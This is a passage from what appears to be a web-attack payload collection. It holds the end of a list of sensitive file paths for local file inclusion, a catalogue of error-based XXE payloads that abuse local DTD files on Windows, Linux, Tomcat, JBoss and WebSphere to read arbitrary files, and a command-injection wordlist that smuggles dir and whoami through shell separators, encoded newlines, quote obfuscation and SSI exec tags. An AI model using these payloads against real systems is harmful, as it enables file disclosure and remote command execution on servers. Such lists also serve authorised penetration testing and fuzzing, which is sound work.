457 | /etc/ftphosts
458 | /var/log/exim_mainlog
459 | /var/log/exim/mainlog
460 | /var/log/maillog
461 | /var/log/exim_paniclog
462 | /var/log/exim/paniclog
463 | /var/log/exim/rejectlog
464 | /var/log/exim_rejectlog
465 | /home/users/web/b1286/ipg.roksbox/index.php
466 | 


--------------------------------------------------------------------------------
/Attacks/XXE/localDTD.txt:
--------------------------------------------------------------------------------
  1 | # XXE payloads for specific DTDs
  2 | 
  3 | **DTD File:** `/C:\Windows\System32\wbem\xml\cim20.dtd`
  4 | 
  5 | **Injectable entity:** `%CIMName`
  6 | 
  7 | **XXE Payload:**
  8 | ```
  9 | <!DOCTYPE message [
 10 |     <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
 11 | 
 12 |     <!ENTITY % CIMName '>
 13 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
 14 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
 15 |         &#x25;eval;
 16 |         &#x25;error;
 17 |         <!ELEMENT aa "bb"'>
 18 | 
 19 |     %local_dtd;
 20 | ]>
 21 | <message></message>
 22 | ```
 23 | 
 24 |  --- 
 25 | 
 26 | **DTD File:** `/C:\Windows\System32\wbem\xml\wmi20.dtd`
 27 | 
 28 | **Injectable entity:** `%CIMName`
 29 | 
 30 | **XXE Payload:**
 31 | ```
 32 | <!DOCTYPE message [
 33 |     <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\wmi20.dtd">
 34 | 
 35 |     <!ENTITY % CIMName '>
 36 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
 37 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
 38 |         &#x25;eval;
 39 |         &#x25;error;
 40 |         <!ELEMENT aa "bb"'>
 41 | 
 42 |     %local_dtd;
 43 | ]>
 44 | <message></message>
 45 | ```
 46 | 
 47 |  --- 
 48 | 
 49 | **DTD File:** `/C:\Program Files (x86)\Lotus\Notes\domino.dtd`
 50 | 
 51 | **Injectable entity:** `%boolean`
 52 | 
 53 | **XXE Payload:**
 54 | ```
 55 | <!DOCTYPE message [
 56 |     <!ENTITY % local_dtd SYSTEM "file:///C:\Program Files (x86)\Lotus\Notes\domino.dtd">
 57 | 
 58 |     <!ENTITY % boolean '(aa) #IMPLIED>
 59 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
 60 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
 61 |         &#x25;eval;
 62 |         &#x25;error;
 63 |         <!ATTLIST attxx aa "bb"'>
 64 | 
 65 |     %local_dtd;
 66 | ]>
 67 | <message></message>
 68 | ```
 69 | 
 70 |  --- 
 71 | 
 72 | **DTD File:** `/C:\Windows\System32\xwizard.dtd`
 73 | 
 74 | **Injectable entity:** `%onerrortypes`
 75 | 
 76 | **XXE Payload:**
 77 | ```
 78 | <!DOCTYPE message [
 79 |     <!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\xwizard.dtd">
 80 | 
 81 |     <!ENTITY % onerrortypes '(aa) #IMPLIED>
 82 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
 83 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
 84 |         &#x25;eval;
 85 |         &#x25;error;
 86 |         <!ATTLIST attxx aa "bb"'>
 87 | 
 88 |     %local_dtd;
 89 | ]>
 90 | <message></message>
 91 | ```
 92 | 
 93 |  --- 
 94 | 
 95 | **DTD File:** `/usr/share/yelp/dtd/docbookx.dtd`
 96 | 
 97 | **Injectable entity:** `%ISOamsa`
 98 | 
 99 | **XXE Payload:**
100 | ```
101 | <!DOCTYPE message [
102 |     <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
103 | 
104 |     <!ENTITY % ISOamsa '
105 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
106 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
107 |         &#x25;eval;
108 |         &#x25;error;
109 |         '>
110 | 
111 |     %local_dtd;
112 | ]>
113 | <message></message>
114 | ```
115 | 
116 |  --- 
117 | 
118 | **DTD File:** `/usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd`
119 | 
120 | **Injectable entity:** `%URI`
121 | 
122 | **XXE Payload:**
123 | ```
124 | <!DOCTYPE message [
125 |     <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd">
126 | 
127 |     <!ENTITY % URI '(aa) #IMPLIED>
128 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
129 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
130 |         &#x25;eval;
131 |         &#x25;error;
132 |         <!ATTLIST attxx aa "bb"'>
133 | 
134 |     %local_dtd;
135 | ]>
136 | <message></message>
137 | ```
138 | 
139 |  --- 
140 | 
141 | **DTD File:** `/usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd`
142 | 
143 | **Injectable entity:** `%Boolean`
144 | 
145 | **XXE Payload:**
146 | ```
147 | <!DOCTYPE message [
148 |     <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd">
149 | 
150 |     <!ENTITY % Boolean '(aa) #IMPLIED>
151 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
152 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
153 |         &#x25;eval;
154 |         &#x25;error;
155 |         <!ATTLIST attxx aa "bb"'>
156 | 
157 |     %local_dtd;
158 | ]>
159 | <message></message>
160 | ```
161 | 
162 |  --- 
163 | 
164 | **DTD File:** `/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd`
165 | 
166 | **Injectable entity:** `%url.attribute.set`
167 | 
168 | **XXE Payload:**
169 | ```
170 | <!DOCTYPE message [
171 |     <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd">
172 | 
173 |     <!ENTITY % url.attribute.set '>
174 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
175 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
176 |         &#x25;eval;
177 |         &#x25;error;
178 |         <!ELEMENT aa "bb"'>
179 | 
180 |     %local_dtd;
181 | ]>
182 | <message></message>
183 | ```
184 | 
185 |  --- 
186 | 
187 | **DTD File:** `/opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd`
188 | 
189 | **Injectable entity:** `%condition`
190 | 
191 | **XXE Payload:**
192 | ```
193 | <!DOCTYPE message [
194 |     <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd">
195 | 
196 |     <!ENTITY % condition 'aaa)>
197 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
198 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
199 |         &#x25;eval;
200 |         &#x25;error;
201 |         <!ELEMENT aa (bb'>
202 | 
203 |     %local_dtd;
204 | ]>
205 | <message></message>
206 | ```
207 | 
208 |  --- 
209 | 
210 | 
211 | **DTD File:** `/usr/share/xml/fontconfig/fonts.dtd`
212 | 
213 | **Injectable entity:** `%constant`
214 | 
215 | **XXE Payload:**
216 | ```
217 | <!DOCTYPE message [
218 |     <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
219 | 
220 |     <!ENTITY % constant 'aaa)>
221 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
222 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
223 |         &#x25;eval;
224 |         &#x25;error;
225 |         <!ELEMENT aa (bb'>
226 | 
227 |     %local_dtd;
228 | ]>
229 | <message></message>
230 | ```
231 | 
232 |  --- 
233 | 
234 | **DTD File:** `/usr/share/struts/struts-config_1_1.dtd`
235 | 
236 | **Injectable entity:** `%AttributeName`
237 | 
238 | **XXE Payload:**
239 | ```
240 | <!DOCTYPE message [
241 |     <!ENTITY % local_dtd SYSTEM "file:///usr/share/struts/struts-config_1_1.dtd">
242 | 
243 |     <!ENTITY % AttributeName '(aa) #IMPLIED>
244 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
245 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
246 |         &#x25;eval;
247 |         &#x25;error;
248 |         <!ATTLIST attxx aa "bb"'>
249 | 
250 |     %local_dtd;
251 | ]>
252 | <message></message>
253 | ```
254 | 
255 |  --- 
256 | 
257 | **DTD File:** `/u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd`
258 | 
259 | **Injectable entity:** `%AttributeName`
260 | 
261 | **XXE Payload:**
262 | ```
263 | <!DOCTYPE message [
264 |     <!ENTITY % local_dtd SYSTEM "file:///u01/oracle/wlserver/server/lib/consoleapp/webapp/WEB-INF/struts-config_1_2.dtd">
265 | 
266 |     <!ENTITY % AttributeName '(aa) #IMPLIED>
267 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
268 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
269 |         &#x25;eval;
270 |         &#x25;error;
271 |         <!ATTLIST attxx aa "bb"'>
272 | 
273 |     %local_dtd;
274 | ]>
275 | <message></message>
276 | ```
277 |  ---
278 | 
279 | **DTD File:** `/usr/share/gtksourceview-4/language-specs/language.dtd`
280 | 
281 | **Injectable entity:** `%itemattrs`
282 | 
283 | **XXE Payload:**
284 | ```
285 | <!DOCTYPE message [
286 |     <!ENTITY % local_dtd SYSTEM "file:///usr/share/gtksourceview-4/language-specs/language.dtd">
287 | 
288 |     <!ENTITY % itemattrs '>
289 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
290 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
291 |         &#x25;eval;
292 |         &#x25;error;
293 |         <!ELEMENT aa "bb"'>
294 | 
295 |     %local_dtd;
296 | ]>
297 | <message></message>
298 | ```
299 | 
300 |  --- 
301 | 
302 | **DTD File:** `/usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd`
303 | 
304 | **Injectable entity:** `%n.InProceedings`
305 | 
306 | **XXE Payload:**
307 | ```
308 | <!DOCTYPE message [
309 |     <!ENTITY % local_dtd SYSTEM "file:///usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd">
310 | 
311 |     <!ENTITY % n.InProceedings 'aaa)>
312 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
313 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
314 |         &#x25;eval;
315 |         &#x25;error;
316 |         <!ELEMENT aa (bb'>
317 | 
318 |     %local_dtd;
319 | ]>
320 | <message></message>
321 | ```
322 | 
323 |  --- 
324 | 
325 | **DTD File:** `/usr/share/boostbook/dtd/boostbook.dtd`
326 | 
327 | **Injectable entity:** `%boost.common.attrib`
328 | 
329 | **XXE Payload:**
330 | ```
331 | <!DOCTYPE message [
332 |     <!ENTITY % local_dtd SYSTEM "file:///usr/share/boostbook/dtd/boostbook.dtd">
333 | 
334 |     <!ENTITY % boost.common.attrib '>
335 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
336 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
337 |         &#x25;eval;
338 |         &#x25;error;
339 |         <!ELEMENT aa "bb"'>
340 | 
341 |     %local_dtd;
342 | ]>
343 | <message></message>
344 | ```
345 | 
346 |  --- 
347 | 
348 | 
349 | **DTD File:** `/opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd`
350 | 
351 | **Injectable entity:** `%queries`
352 | 
353 | **XXE Payload:**
354 | ```
355 | <!DOCTYPE message [
356 |     <!ENTITY % local_dtd SYSTEM "file:///opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd">
357 | 
358 |     <!ENTITY % queries 'aaa)>
359 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
360 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
361 |         &#x25;eval;
362 |         &#x25;error;
363 |         <!ELEMENT aa (bb'>
364 | 
365 |     %local_dtd;
366 | ]>
367 | <message></message>
368 | ```
369 | 
370 |  --- 
371 | 
372 | **DTD File:** `/opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd`
373 | 
374 | **Injectable entity:** `%publicIdentifier`
375 | 
376 | **XXE Payload:**
377 | ```
378 | <!DOCTYPE message [
379 |     <!ENTITY % local_dtd SYSTEM "file:///opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd">
380 | 
381 |     <!ENTITY % publicIdentifier '(aa) #IMPLIED>
382 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
383 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
384 |         &#x25;eval;
385 |         &#x25;error;
386 |         <!ATTLIST attxx aa "bb"'>
387 | 
388 |     %local_dtd;
389 | ]>
390 | <message></message>
391 | ```
392 | 
393 |  --- 
394 | 
395 | **DTD File:** `/usr/share/nmap/nmap.dtd`
396 | 
397 | **Injectable entity:** `%attr_numeric`
398 | 
399 | **XXE Payload:**
400 | ```
401 | <!DOCTYPE message [
402 |     <!ENTITY % local_dtd SYSTEM "file:///usr/share/nmap/nmap.dtd">
403 | 
404 |     <!ENTITY % attr_numeric '(aa) #IMPLIED>
405 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
406 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
407 |         &#x25;eval;
408 |         &#x25;error;
409 |         <!ATTLIST attxx aa "bb"'>
410 | 
411 |     %local_dtd;
412 | ]>
413 | <message></message>
414 | ```
415 | 
416 |  --- 
417 | 
418 | **DTD File:** `/usr/share/liteide/liteeditor/kate/language.dtd`
419 | 
420 | **Injectable entity:** `%commonAttributes`
421 | 
422 | **XXE Payload:**
423 | ```
424 | <!DOCTYPE message [
425 |     <!ENTITY % local_dtd SYSTEM "file:///usr/share/liteide/liteeditor/kate/language.dtd">
426 | 
427 |     <!ENTITY % commonAttributes '>
428 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
429 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
430 |         &#x25;eval;
431 |         &#x25;error;
432 |         <!ELEMENT aa "bb"'>
433 | 
434 |     %local_dtd;
435 | ]>
436 | <message></message>
437 | ```
438 | 
439 |  --- 
440 | 
441 | **DTD File:** `/usr/share/libgweather/locations.dtd`
442 | 
443 | **Injectable entity:** `%name`
444 | 
445 | **XXE Payload:**
446 | ```
447 | <!DOCTYPE message [
448 |     <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgweather/locations.dtd">
449 | 
450 |     <!ENTITY % name 'aaa)>
451 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
452 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
453 |         &#x25;eval;
454 |         &#x25;error;
455 |         <!ELEMENT aa (bb'>
456 | 
457 |     %local_dtd;
458 | ]>
459 | <message></message>
460 | ```
461 | 
462 |  --- 
463 | 
464 | **DTD File:** `/usr/share/libgda-5.0/dtd/libgda-server-operation.dtd`
465 | 
466 | **Injectable entity:** `%paramlist-dtd`
467 | 
468 | **XXE Payload:**
469 | ```
470 | <!DOCTYPE message [
471 |     <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-server-operation.dtd">
472 | 
473 |     <!ENTITY % paramlist-dtd '
474 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
475 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
476 |         &#x25;eval;
477 |         &#x25;error;
478 |         '>
479 | 
480 |     %local_dtd;
481 | ]>
482 | <message></message>
483 | ```
484 | 
485 |  --- 
486 | 
487 | **DTD File:** `/usr/share/libgda-5.0/dtd/libgda-paramlist.dtd`
488 | 
489 | **Injectable entity:** `%array-dtd`
490 | 
491 | **XXE Payload:**
492 | ```
493 | <!DOCTYPE message [
494 |     <!ENTITY % local_dtd SYSTEM "file:///usr/share/libgda-5.0/dtd/libgda-paramlist.dtd">
495 | 
496 |     <!ENTITY % array-dtd '
497 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
498 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
499 |         &#x25;eval;
500 |         &#x25;error;
501 |         '>
502 | 
503 |     %local_dtd;
504 | ]>
505 | <message></message>
506 | ```
507 | 
508 |  --- 
509 | 
510 | **DTD File:** `/usr/share/xml/docutils/docutils.dtd`
511 | 
512 | **Injectable entity:** `%measure`
513 | 
514 | **XXE Payload:**
515 | ```
516 | <!DOCTYPE message [
517 |     <!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/docutils/docutils.dtd">
518 | 
519 |     <!ENTITY % measure '(aa) #IMPLIED>
520 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
521 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
522 |         &#x25;eval;
523 |         &#x25;error;
524 |         <!ATTLIST attxx aa "bb"'>
525 | 
526 |     %local_dtd;
527 | ]>
528 | <message></message>
529 | ```
530 | 
531 |  --- 
532 | 
533 | **DTD File:** `/usr/share/dblatex/schema/dblatex-config.dtd`
534 | 
535 | **Injectable entity:** `%attlist.modname`
536 | 
537 | **XXE Payload:**
538 | ```
539 | <!DOCTYPE message [
540 |     <!ENTITY % local_dtd SYSTEM "file:///usr/share/dblatex/schema/dblatex-config.dtd">
541 | 
542 |     <!ENTITY % attlist.modname '>
543 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
544 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
545 |         &#x25;eval;
546 |         &#x25;error;
547 |         <!ELEMENT aa "bb"'>
548 | 
549 |     %local_dtd;
550 | ]>
551 | <message></message>
552 | ```
553 | 
554 |  --- 
555 | 
556 | **DTD File:** `/usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd`
557 | 
558 | **Injectable entity:** `%common`
559 | 
560 | **XXE Payload:**
561 | ```
562 | <!DOCTYPE message [
563 |     <!ENTITY % local_dtd SYSTEM "file:///usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd">
564 | 
565 |     <!ENTITY % block "xxx" >
566 | 
567 |     <!ENTITY % common '
568 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
569 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
570 |         &#x25;eval;
571 |         &#x25;error;
572 |         '>
573 | 
574 |     %local_dtd;
575 | ]>
576 | <message></message>
577 | ```
578 | 
579 |  --- 
580 | 
581 | **DTD File:** `/usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd`
582 | 
583 | **Injectable entity:** `%xs-datatypes`
584 | 
585 | **XXE Payload:**
586 | ```
587 | <!DOCTYPE message [
588 |     <!ENTITY % local_dtd SYSTEM "file:///usr/local/tomcat/lib/servlet-api.jar!/javax/servlet/resources/XMLSchema.dtd">
589 | 
590 |     <!ENTITY % xs-datatypes '
591 |         <!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
592 |         <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
593 |         &#x25;eval;
594 |         &#x25;error;
595 |         '>
596 | 
597 |     %local_dtd;
598 | ]>
599 | <message></message>
600 | ```
601 | 
602 |  --- 
603 | 


--------------------------------------------------------------------------------
/Attacks/CommandInjection.txt:
--------------------------------------------------------------------------------
  1 | dir
  2 | ;dir
  3 | ;dir;
  4 | ^dir
  5 | |dir
  6 | <dir
  7 | <dir;
  8 | <dir\n
  9 | <dir%0D
 10 | <dir%0A
 11 | &dir
 12 | &dir&
 13 | &&dir
 14 | &&dir&&
 15 | %0Ddir
 16 | %0Ddir%0D
 17 | %0Adir
 18 | %0Adir%0A
 19 | \ndir
 20 | \ndir\n
 21 | 'dir'
 22 | `dir`
 23 | ;dir|
 24 | ;dir/n
 25 | |dir;
 26 | a);dir
 27 | a;dir
 28 | a);dir
 29 | a;dir;
 30 | a);dir|
 31 | FAIL||dir
 32 | CMD=$'dir';$CMD
 33 | ;CMD=$'dir';$CMD
 34 | ^CMD=$'dir';$CMD
 35 | |CMD=$'dir';$CMD
 36 | &CMD=$'dir';$CMD
 37 | &&CMD=$'dir';$CMD
 38 | %0DCMD=$'dir';$CMD
 39 | FAIL||CMD=$'dir';$CMD
 40 | CMD=$\'dir\';$CMD
 41 | ;CMD=$\'dir\';$CMD
 42 | ^CMD=$\'dir\';$CMD
 43 | |CMD=$\'dir\';$CMD
 44 | &CMD=$\'dir\';$CMD
 45 | &&CMD=$\'dir\';$CMD
 46 | %0DCMD=$\'dir\';$CMD
 47 | FAIL||CMD=$\'dir\';$CMD
 48 | CMD=$"dir";$CMD
 49 | ;CMD=$"dir";$CMD
 50 | ^CMD=$"dir";$CMD
 51 | |CMD=$"dir";$CMD
 52 | &CMD=$"dir";$CMD
 53 | &&CMD=$"dir";$CMD
 54 | %0DCMD=$"dir";$CMD
 55 | FAIL||CMD=$"dir";$CMD
 56 | <!--#exec cmd="dir"-->
 57 | ;system('dir')
 58 | $(dir)
 59 | whoami
 60 | ;whoami
 61 | ;whoami;
 62 | ^whoami
 63 | |whoami
 64 | <whoami
 65 | <whoami;
 66 | <whoami\n
 67 | <whoami%0D
 68 | <whoami%0A
 69 | &whoami
 70 | &whoami&
 71 | &&whoami
 72 | &&whoami&&
 73 | %0Dwhoami
 74 | %0Dwhoami%0D
 75 | %0Awhoami
 76 | %0Awhoami%0A
 77 | \nwhoami
 78 | \nwhoami\n
 79 | 'whoami'
 80 | `whoami`
 81 | ;whoami|
 82 | ;whoami/n
 83 | |whoami;
 84 | a);whoami
 85 | a;whoami
 86 | a);whoami
 87 | a;whoami;
 88 | a);whoami|
 89 | FAIL||whoami
 90 | CMD=$'whoami';$CMD
 91 | ;CMD=$'whoami';$CMD
 92 | ^CMD=$'whoami';$CMD
 93 | |CMD=$'whoami';$CMD
 94 | &CMD=$'whoami';$CMD
 95 | &&CMD=$'whoami';$CMD
 96 | %0DCMD=$'whoami';$CMD
 97 | FAIL||CMD=$'whoami';$CMD
 98 | CMD=$\'whoami\';$CMD
 99 | ;CMD=$\'whoami\';$CMD
100 | ^CMD=$\'whoami\';$CMD
101 | |CMD=$\'whoami\';$CMD
102 | &CMD=$\'whoami\';$CMD
103 | &&CMD=$\'whoami\';$CMD
104 | %0DCMD=$\'whoami\';$CMD
105 | FAIL||CMD=$\'whoami\';$CMD
106 | CMD=$"whoami";$CMD
107 | ;CMD=$"whoami";$CMD
108 | ^CMD=$"whoami";$CMD
109 | |CMD=$"whoami";$CMD
110 | &CMD=$"whoami";$CMD
111 | &&CMD=$"whoami";$CMD
112 | %0DCMD=$"whoami";$CMD
113 | FAIL||CMD=$"whoami";$CMD
114 | <!--#exec cmd="whoami"-->
115 | ;system('whoami')
116 | $(whoami)
117 | wh"o"ami
118 | ;wh"o"ami
119 | ;wh"o"ami;
120 | ^wh"o"ami
121 | |wh"o"ami
122 | <wh"o"ami
123 | <wh"o"ami;
124 | <wh"o"ami\n
125 | <wh"o"ami%0D
126 | <wh"o"ami%0A
127 | &wh"o"ami
128 | &wh"o"ami&
129 | &&wh"o"ami
130 | &&wh"o"ami&&
131 | %0Dwh"o"ami
132 | %0Dwh"o"ami%0D
133 | %0Awh"o"ami
134 | %0Awh"o"ami%0A
135 | \nwh"o"ami
136 | \nwh"o"ami\n
137 | 'wh"o"ami'
138 | `wh"o"ami`
139 | ;wh"o"ami|
140 | ;wh"o"ami/n
141 | |wh"o"ami;
142 | a);wh"o"ami
143 | a;wh"o"ami
144 | a);wh"o"ami
145 | a;wh"o"ami;
146 | a);wh"o"ami|
147 | FAIL||wh"o"ami
148 | CMD=$'wh"o"ami';$CMD
149 | ;CMD=$'wh"o"ami';$CMD
150 | ^CMD=$'wh"o"ami';$CMD
151 | |CMD=$'wh"o"ami';$CMD
152 | &CMD=$'wh"o"ami';$CMD
153 | &&CMD=$'wh"o"ami';$CMD
154 | %0DCMD=$'wh"o"ami';$CMD
155 | FAIL||CMD=$'wh"o"ami';$CMD
156 | CMD=$\'wh"o"ami\';$CMD
157 | ;CMD=$\'wh"o"ami\';$CMD
158 | ^CMD=$\'wh"o"ami\';$CMD
159 | |CMD=$\'wh"o"ami\';$CMD
160 | &CMD=$\'wh"o"ami\';$CMD
161 | &&CMD=$\'wh"o"ami\';$CMD
162 | %0DCMD=$\'wh"o"ami\';$CMD
163 | FAIL||CMD=$\'wh"o"ami\';$CMD
164 | CMD=$"wh"o"ami";$CMD
165 | ;CMD=$"wh"o"ami";$CMD
166 | ^CMD=$"wh"o"ami";$CMD
167 | |CMD=$"wh"o"ami";$CMD
168 | &CMD=$"wh"o"ami";$CMD
169 | &&CMD=$"wh"o"ami";$CMD
170 | %0DCMD=$"wh"o"ami";$CMD
171 | FAIL||CMD=$"wh"o"ami";$CMD
172 | <!--#exec cmd="wh"o"ami"-->
173 | ;system('wh"o"ami')
174 | $(wh"o"ami)
175 | wh'oa'mi
176 | ;wh'oa'mi
177 | ;wh'oa'mi;
178 | ^wh'oa'mi
179 | |wh'oa'mi
180 | <wh'oa'mi
181 | <wh'oa'mi;
182 | <wh'oa'mi\n
183 | <wh'oa'mi%0D
184 | <wh'oa'mi%0A
185 | &wh'oa'mi
186 | &wh'oa'mi&
187 | &&wh'oa'mi
188 | &&wh'oa'mi&&
189 | %0Dwh'oa'mi
190 | %0Dwh'oa'mi%0D
191 | %0Awh'oa'mi
192 | %0Awh'oa'mi%0A
193 | \nwh'oa'mi
194 | \nwh'oa'mi\n
195 | 'wh'oa'mi'
196 | `wh'oa'mi`
197 | ;wh'oa'mi|
198 | ;wh'oa'mi/n
199 | |wh'oa'mi;
200 | a);wh'oa'mi
201 | a;wh'oa'mi
202 | a);wh'oa'mi
203 | a;wh'oa'mi;
204 | a);wh'oa'mi|
205 | FAIL||wh'oa'mi
206 | CMD=$'wh'oa'mi';$CMD
207 | ;CMD=$'wh'oa'mi';$CMD
208 | ^CMD=$'wh'oa'mi';$CMD
209 | |CMD=$'wh'oa'mi';$CMD
210 | &CMD=$'wh'oa'mi';$CMD
211 | &&CMD=$'wh'oa'mi';$CMD
212 | %0DCMD=$'wh'oa'mi';$CMD
213 | FAIL||CMD=$'wh'oa'mi';$CMD
214 | CMD=$\'wh'oa'mi\';$CMD
215 | ;CMD=$\'wh'oa'mi\';$CMD
216 | ^CMD=$\'wh'oa'mi\';$CMD
217 | |CMD=$\'wh'oa'mi\';$CMD
218 | &CMD=$\'wh'oa'mi\';$CMD
219 | &&CMD=$\'wh'oa'mi\';$CMD
220 | %0DCMD=$\'wh'oa'mi\';$CMD
221 | FAIL||CMD=$\'wh'oa'mi\';$CMD
222 | CMD=$"wh'oa'mi";$CMD
223 | ;CMD=$"wh'oa'mi";$CMD
224 | ^CMD=$"wh'oa'mi";$CMD
225 | |CMD=$"wh'oa'mi";$CMD
226 | &CMD=$"wh'oa'mi";$CMD
227 | &&CMD=$"wh'oa'mi";$CMD
228 | %0DCMD=$"wh'oa'mi";$CMD
229 | FAIL||CMD=$"wh'oa'mi";$CMD
230 | <!--#exec cmd="wh'oa'mi"-->
